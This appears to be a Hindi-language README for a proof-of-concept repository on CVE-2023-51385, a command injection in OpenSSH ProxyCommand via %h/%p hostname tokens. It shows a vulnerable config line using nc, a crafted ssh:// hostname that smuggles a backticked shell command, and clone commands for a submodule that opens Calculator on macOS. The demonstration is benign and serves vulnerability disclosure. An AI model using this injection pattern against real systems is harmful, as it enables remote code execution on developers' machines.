
CVE-2023-51385
असुरक्षित ~/.ssh/config के माध्यम से RCE SSH.ProxyCommand का उपयोग करके टनल और कनेक्शन प्रॉक्सिंग के लिए %h, %p जैसे टोकन का उपयोग काफी लोकप्रिय है।
कमजोर कॉन्फ़िगरेशन host *.example.com ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p नोट: मेरे प्रारंभिक मूल्यांकन में मुझे लगा था कि '%h` (एकल उद्धरण) का उपयोग इससे बच जाएगा, लेकिन ऐसा लगता है कि यह अभी भी कमजोर है, जैसे:
ssh://echo helloworld > cve.txt`foo.example.com/bar
स्रोत: https://man.openbsd.org/ssh_config#ProxyCommand
इस रिपॉजिटरी में क्या है एक सबमॉड्यूल जो इस कमजोरी का शोषण करके OSX पर कैलकुलेटर खोलता है।
इसे आज़माने के लिए:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
या
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules